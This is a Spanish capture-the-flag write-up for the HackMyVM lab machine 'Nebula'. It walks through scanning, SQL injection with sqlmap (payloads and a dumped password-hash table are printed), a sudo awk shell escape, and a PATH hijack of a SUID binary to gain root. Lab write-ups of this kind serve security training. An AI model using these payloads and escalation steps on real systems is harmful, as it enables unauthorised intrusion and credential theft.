Nebula HackMyVM
- Ip atacante - 10.0.2.4
- Ip victima - 10.0.2.42
Encontrar la maquina
Primero buscamos la maquina en la red con un arp-scan
❯ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 08:00:27:b1:9d:67, IPv4: 10.0.2.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.42 (Unknown)
Entonces ya sabemos la ip de nuestra victima
Nmap
Realizamos el scaneo a la maquina
❯ sudo nmap -Pn -sS -p 22,80 -A 10.0.2.42
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 21:01 EST
Nmap scan report for 10.0.2.42
Host is up (0.00073s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA)
| 256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA)
|_ 256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Nebula Lexus Labs
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:AA:A8:FD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 10.0.2.42
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.00 seconds
Enumeracion
Encontramos que la pagina en el http tiene un login, intentamos un poco de SQLI pero no sirvio de nada. A continuacion procedo a hacer la enumeracion de directorios
❯ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.42/FUZZ -fs 3479
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.0.2.42/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 3479
________________________________________________
[Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 10ms]
* FUZZ: login
[Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 1097ms]
* FUZZ: img
[Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 6ms]
* FUZZ: joinus
[Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 5ms]
* FUZZ: server-status
:: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
Encontramos la pagina http://10.0.2.42/joinus/ y nos da un pdf
que nos dice que cuando nos acepten en el trabajo tiene un link que nos enviaran
What to do when you are accepted
When you are accepted, we’ll advise you with a message to
your mail, with a user and password to access to the Meeting
URL in the website.
The link will be like:
https://nebulalabs.org/meetings?user=admin&password=d46df
********************8f3b083
Con esas credenciales ingresamos al http://10.0.2.42/login y obtenemos acceso.
Entramos a la pagina http://10.0.2.42/login/search_central.php?id=
y probamos si tiene SQLI con SQLMAP
❯ sqlmap -u "http://10.0.2.42/login/search_central.php?id=*" --batch --level=5 --risk=3 -dbs --tables
___
__H__
___ ___["]_____ ___ ___ {1.7.6#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:39:02 /2024-01-05/
...
[21:39:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:39:14] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] nebuladb
[21:39:14] [INFO] fetching tables for databases: 'information_schema, nebuladb'
Database: information_schema
[78 tables]
+---------------------------------------+
| ALL_PLUGINS |
| APPLICABLE_ROLES |
| CHARACTER_SETS |
| CHECK_CONSTRAINTS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES |
| ENABLED_ROLES |
| FILES |
| GEOMETRY_COLUMNS |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_MUTEXES |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_SEMAPHORE_WAITS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_SYS_VIRTUAL |
| INNODB_TABLESPACES_ENCRYPTION |
| INNODB_TABLESPACES_SCRUBBING |
| INNODB_TRX |
| KEYWORDS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| SPATIAL_REF_SYS |
| SQL_FUNCTIONS |
| STATISTICS |
| SYSTEM_VARIABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| COLUMNS |
| ENGINES |
| EVENTS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| TABLES |
| TRIGGERS |
| user_variables |
+---------------------------------------+
Database: nebuladb
[3 tables]
+---------------------------------------+
| central |
| centrals |
| users |
+---------------------------------------+
[21:39:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.2.42'
[21:39:15] [WARNING] your sqlmap version is outdated
[*] ending @ 21:39:14 /2024-01-05/
Ya sabiendo la base de datos y la tabla que queremos ver. En esta ocasion la tabla users corremos el siguiente comando
❯ sqlmap -u "http://10.0.2.42/login/search_central.php?id=*" --batch --level=5 --risk=3 -D nebuladb -T users --dump
___
__H__
___ ___[(]_____ ___ ___ {1.7.6#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:46:53 /2024-01-05/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[21:46:53] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:46:53] [INFO] resuming back-end DBMS 'mysql'
[21:46:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://10.0.2.42/login/search_central.php?id=-2379' OR 6701=6701-- hLqr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://10.0.2.42/login/search_central.php?id=' AND (SELECT 1652 FROM (SELECT(SLEEP(5)))rkLR)-- feyp
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://10.0.2.42/login/search_central.php?id=' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b6b71,0x4256537155644d48646f4a78535a6e546a54765361646c644d44515870617742634371544565457a,0x717a707671)-- -
---
[21:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:46:53] [INFO] fetching columns for table 'users' in database 'nebuladb'
[21:46:53] [INFO] fetching entries for table 'users' in database 'nebuladb'
[21:46:53] [INFO] recognized possible password hashes in column '`password`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:46:53] [INFO] using hash method 'md5_generic_passwd'
[21:46:53] [INFO] resuming password '*********' for hash 'c8c605999f3d8352d7bb792cf3fdb25b' for user 'pmccentral'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:46:53] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[21:46:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:46:53] [INFO] starting 4 processes
Database: nebuladb
Table: users
[7 entries]
+----+----------+-------------+----------------------------------------------+
| id | is_admin | username | password |
+----+----------+-------------+----------------------------------------------+
| 1 | 1 | admin | d46df8e6a5627debf930f7b5c8f3b083 |
| 2 | 0 | pmccentral | c8c605999f3d8352d7bb792cf3fdb25b
(********* ) |
| 3 | 0 | Frederick | 5f823f1ac7c9767c8d1efbf44158e0ea |
| 3 | 0 | Samuel | 4c6dda8a9d149332541e577b53e2a3ea |
| 5 | 0 | Mary | 41ae0e6fbe90c08a63217fc964b12903 |
| 6 | 0 | hecolivares | 5d8cdc88039d5fc021880f9af4f7c5c3 |
| 7 | 1 | pmccentral | c8c605999f3d8352d7bb792cf3fdb25b (********* ) |
+----+----------+-------------+----------------------------------------------+
[21:47:02] [INFO] table 'nebuladb.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.0.2.42/dump/nebuladb/users.csv'
[21:47:02] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.2.42'
[21:47:02] [WARNING] your sqlmap version is outdated
[*] ending @ 21:47:02 /2024-01-05/
Ya tenemos las credenciales de pmccentral asi que ingresamos por ssh
❯ ssh pmccentral@10.0.2.42
Escalacion de privilegios
pmccentral@laboratoryuser:~$ sudo -l
Matching Defaults entries for pmccentral on laboratoryuser:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pmccentral may run the following commands on laboratoryuser:
(laboratoryadmin) /usr/bin/awk
Buscamos en gtfobins como escalar privilegios y nos da una solucion, la cual aplicaremos
pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(laboratoryadmin) gid=1002(laboratoryadmin) groups=1002(laboratoryadmin)
$ pwd
/home/pmccentral
$ cd ..
$ ls
laboratoryadmin pmccentral
$ cd laboratoryadmin
$ bash
laboratoryadmin@laboratoryuser:~$ cat user.txt
flag{**************************}
Root
Ahora buscaremos la forma de ser usuarios Root
Encontramos un direcorio que dice autoScripts
laboratoryadmin@laboratoryuser:~/autoScripts$ ls -la
total 32
drwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 18 20:16 .
drwx------ 8 laboratoryadmin laboratoryadmin 4096 Dec 18 16:15 ..
-rwxrwxr-x 1 laboratoryadmin laboratoryadmin 8 Dec 18 20:16 head
-rwsr-xr-x 1 root root 16792 Dec 17 15:40 PMCEmployees
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
bash -p
laboratoryadmin@laboratoryuser:~/autoScripts$ cat PMCEmployees
@@@@�ppUU ���-�=�=hp�-�=�=�888 XXXDDS�td888 P�tdh h h DDQ�tdR�td�-�=�=XX/lib64/ld-linux-x86-64.so.2GNU�GNU.�?fm�|����7sC�GN�e�mM /i x
[...]
@ @7@H>Rf�@� @� ��e��@�oHH�hh�B((� @�``�pp0� �h h D�� ������=�-��?�@0
@00+@0H. �64�8�
con string solucionamos el tema y leemos un poco mejor. Parece ser un historial o algo parecido.
Aqui me trabe un poco y tuve que ver un writeup para ver que habian hecho
laboratoryadmin@laboratoryuser:~/autoScripts$ head /home/pmccentral/documents/employees.txt
aren
Aarika
Abagael
Abagail
Abbe
Abbey
Abbi
Abbie
Abby
Abbye
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
bash -p
laboratoryadmin@laboratoryuser:~/autoScripts$ sudo head /home/pmccentral/documents/employees.txt
[sudo] password for laboratoryadmin:
laboratoryadmin@laboratoryuser:~/autoScripts$ export PATH=/home/laboratoryadmin/autoScripts/:$PATH
laboratoryadmin@laboratoryuser:~/autoScripts$ ./PMCEmployees
root@laboratoryuser:~/autoScripts# ^C
root@laboratoryuser:~/autoScripts# cd /root
root@laboratoryuser:/root# cat root.txt
flag{**********}